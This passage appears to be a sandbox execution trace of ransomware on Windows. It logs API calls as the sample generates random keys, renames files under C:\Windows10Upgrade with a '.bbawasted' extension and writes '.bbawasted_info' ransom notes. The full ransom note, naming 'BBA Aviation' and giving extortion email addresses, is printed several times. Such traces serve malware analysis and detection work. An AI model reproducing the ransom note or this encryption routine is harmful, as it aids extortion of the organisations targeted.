returned 1 [0234.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.338] CloseHandle (hObject=0x27c) returned 1 [0234.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a17c0 | out: hHeap=0x660000) returned 1 [0234.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1570 | out: hHeap=0x660000) returned 1 [0234.338] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6b48) returned 1 [0234.339] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0234.339] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0234.339] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\block.png") returned 46 [0234.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x6c4b88 [0234.340] lstrcpyW (in: lpString1=0x6c4be4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0234.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.340] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a62c8) returned 1 [0234.340] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0234.340] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0234.340] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\block.png.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\block.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0234.341] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0234.342] SetEndOfFile (hFile=0x27c) returned 1 [0234.342] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.343] lstrcpyW (in: lpString1=0x6c4be4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0234.343] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\block.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\block.png"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\block.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\block.png.bbawasted")) returned 1 [0234.424] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\block.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\block.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0234.424] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0234.425] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x397 [0234.425] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x397) returned 0x5f0000 [0234.469] CloseHandle (hObject=0x28c) returned 1 [0234.473] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0234.473] CloseHandle (hObject=0x294) returned 1 [0234.473] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0234.473] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a65f8) returned 1 [0234.474] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0234.474] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0234.474] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6708) returned 1 [0234.475] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0234.475] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0234.487] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0234.487] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0234.487] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.487] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ReTshkpTBQhOb4GfJ/YjEwrsPIW1mqxwKAhSl/TcerbpOAgVWu0h9bklFucq2ai+\r\nx9BnH93BjzjSdOCj+MHPxK1LbOwT65TMXdBu3hlWvBfwowBRq01uXdqbFRW6SNk2\r\njfmVDeQAucK6w5mu2d5myDegq2QvZmtmLODyvIkut1olTvSYWyumggelG/n7a70Q\r\nEg5oCO37SInRFSpoWAScMEfEFLFbi73HMtxlhwYrgsY/GNvTWsQRZYoLT1P+ZzDC\r\nATUGFcjE+gKW41e0s5m1ZSWemSN/Gkcfberh8KDq8PsdiQb/yfyzreZt9fnXtBa8\r\n6CDNWSprXOoAXBginDS1IJqpb2yNPoLQaCf3k1qvHyY/pMSNvjZYuPG/PnutNV+8\r\n8zMQZBT1SbcdQRNzsg40m0lhUI/MSM+OqXqVPpzSXGUdeIak7ap/ZwMo3XB67ET0\r\nvYy+kCpui7cfQuXClGil+XN99TB+u3VghyjkZdV3J/yjRncAwQlu5vPNL7mZjszF\r\nI9+fOPZ2nTGAM88uA0aLkzVtDIiqGKS/tJwMgXktLKTQP08GJQxft5DwYGBbjWjT\r\nZid2ktx9MWcpovo3CRs0xyhY8BktoaYsOpaRZAR2eQVnPD+TivXtA1lQQLXmxigZ\r\nRTJghRTSMzTsLXU+M05XPDChGbBTPWdv60WAgWstuoE=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.487] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0234.487] WriteFile (in: hFile=0x27c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0234.487] SetEndOfFile (hFile=0x27c) returned 1 [0234.490] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.490] CloseHandle (hObject=0x27c) returned 1 [0234.490] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0234.490] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdb70 | out: hHeap=0x660000) returned 1 [0234.490] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a64e8) returned 1 [0234.491] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0234.491] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0234.491] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\bullet.png") returned 47 [0234.491] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x268) returned 0x6c4b88 [0234.491] lstrcpyW (in: lpString1=0x6c4be6, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0234.491] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.491] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6350) returned 1 [0234.492] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0234.492] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0234.492] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\bullet.png.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\bullet.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0234.546] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0234.560] SetEndOfFile (hFile=0x28c) returned 1 [0234.560] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.560] lstrcpyW (in: lpString1=0x6c4be6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0234.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\bullet.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\bullet.png"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\bullet.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\bullet.png.bbawasted")) returned 1 [0234.561] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\bullet.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\bullet.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0234.561] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0234.561] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xdd [0234.561] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdd) returned 0x5f0000 [0234.561] CloseHandle (hObject=0x27c) returned 1 [0234.562] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0234.562] CloseHandle (hObject=0x294) returned 1 [0234.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0234.562] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6ac0) returned 1 [0234.563] CryptGenRandom (in: hProv=0x6a6ac0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0234.563] CryptReleaseContext (hProv=0x6a6ac0, dwFlags=0x0) returned 1 [0234.563] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a68a0) returned 1 [0234.563] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0234.563] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0234.573] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0234.573] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0234.573] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.573] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]VBhV3GVJqxqjfE3LPqwldZoKYZbhqP+TY4XeGu8U2JaWrnKtmw5fm80KeQ8GhCqB\r\nM2VLRHvLgeBqTH1kzuc3uHCLoQbx9/UqhI8IyjorWK39re5vBaw5KBcuYyq5RDS9\r\nSLKH7l3RRXEh7xjUUpj6y0MT2sUYbga9/lYrmpvzfO7vCqfa+J393WrYP1QfU4z0\r\nXv3+cIQRT5RB6LOK4Z9EhJhaW6C2Q0lY50rUOIzaXp88HEQ8Z5mhjfc8hiBeyS1q\r\nbqTroF171PtB3s4xmiz94s+Rv/BtLNiuvjHsXmyYhynnMA1kVOtciEfTFpDaFRo+\r\nhldT8ClP2VL73AD94TrDOCeqXWf4cPnnNnV2yfOgU3dT5eajK+cEQBYDtBO03SxF\r\n1r9d7tadw2/rtsK2sttt33F5nH9vJ8XnOIaI5gFsxjp6wKPu3FmaI+n0/KHtqpuy\r\nQ7ZUT+wtWOu4LuEMM18h2lHLsXj3RpCGe4KTvjgQ4+BZDkN2XXhsC4g5H+B7g3py\r\njDkMRQXTLudSIy6m1tpxo91qRt7/uW49p4MESbHllJDB+aMUAwKqjPWDgzd0ZZEj\r\nIh665n2uvAj5/gZroG2WA1gzjtRk9nMmKUQj15Hd7232WvODdfSHMJG/Bo24luSB\r\neLTqRis1ptaYnaE5WvK0E98KyDMtdu8lQNzL5JsvFn8=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.573] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0234.573] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0234.573] SetEndOfFile (hFile=0x28c) returned 1 [0234.577] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.577] CloseHandle (hObject=0x28c) returned 1 [0234.577] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0234.577] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bd890 | out: hHeap=0x660000) returned 1 [0234.578] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6b48) returned 1 [0234.578] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0234.578] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0234.578] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default.htm") returned 48 [0234.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6a1538 [0234.578] lstrcpyW (in: lpString1=0x6a1598, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0234.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.578] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6350) returned 1 [0234.579] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0234.579] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0234.579] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0234.584] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0234.585] SetEndOfFile (hFile=0x28c) returned 1 [0234.586] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.586] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.586] lstrcpyW (in: lpString1=0x6a1598, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0234.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.htm.bbawasted")) returned 1 [0234.587] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0234.587] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0234.587] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xf44d [0234.587] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf44d) returned 0x5f0000 [0234.588] CloseHandle (hObject=0x294) returned 1 [0234.592] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0234.593] CloseHandle (hObject=0x27c) returned 1 [0234.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0234.593] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5e88) returned 1 [0234.593] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0234.593] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0234.594] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6ce0) returned 1 [0234.594] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0234.594] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0234.604] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0234.604] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0234.604] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.604] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jJwdfy4+NNNTLiFUucVBu1Qeh6YDC8sIfCcoCawRHtHYTeBu5wCZs1vlcJ/NKYgf\r\nUu5gOshITsb+DZAuBCiseSJUS4zSsqmnJX7BOOCtbZwF63ZPZleU8b/9yp/lOXs0\r\nJMs4zPDToUHSSJFFvTUjTrgK5G1Noc34O9PSIhrc8fwAnGBr8R0qSnrhrmZthYyd\r\npZLg1XC5KHmXhbC93xIkVRnnQNobfTqmG5zRs8mPOgZR+qTvVg2BAwexjU8kuKpB\r\n6WQjSlceoqUsYhDpNQrdVXVuKY1u+upvrGOigrQNevA3bTR4Q7dGn46h/EYqkpBb\r\nl1QtbGTqUEe0cOfSivTZPlvspu/VR+4giCYRlR97aH3gl9BVyKDcay3cdMeiyh6R\r\n5NefDEsBDEJz2UZTWANjxeaDZGTNU0aCZIHGv6DEYq6uO7U61/+XAIHFnChJxc4g\r\nDtb1QIkC3i/loxQ4djoZ01Ct8vhmT9i2An/5vt4lsEwYtLrE5R3eG7VGbtEuNMF0\r\nfaAN4uyiDjPuA17CuSzEJl3kWUfOEjI5RLj5EArFxLHbo1hIBscVkx/PghNrUY5p\r\nhyWrsbMLAqZttiVvlO5a9RzQAOC1BgkG4diC8baH/nPjao4YPNPlyP6gbyQD4pIj\r\nyCz28P/4QpZHYS2Md7cqe3vKIntMYcNV+7KBBUnNXzv=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.604] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0234.604] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0234.604] SetEndOfFile (hFile=0x28c) returned 1 [0234.757] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.757] CloseHandle (hObject=0x28c) returned 1 [0234.758] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1538 | out: hHeap=0x660000) returned 1 [0234.758] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b20b0 | out: hHeap=0x660000) returned 1 [0234.758] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6c58) returned 1 [0234.759] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0234.759] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0234.759] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm") returned 52 [0234.759] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6ad900 [0234.760] lstrcpyW (in: lpString1=0x6ad968, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0234.760] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.760] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a68a0) returned 1 [0234.761] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0234.761] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0234.761] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0235.046] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0235.048] SetEndOfFile (hFile=0x28c) returned 1 [0235.048] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.048] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.048] lstrcpyW (in: lpString1=0x6ad968, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0235.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.htm.bbawasted")) returned 1 [0235.050] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default_eos.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_eos.htm.bbawasted"), dwDesiredAccess=0xc0000000, 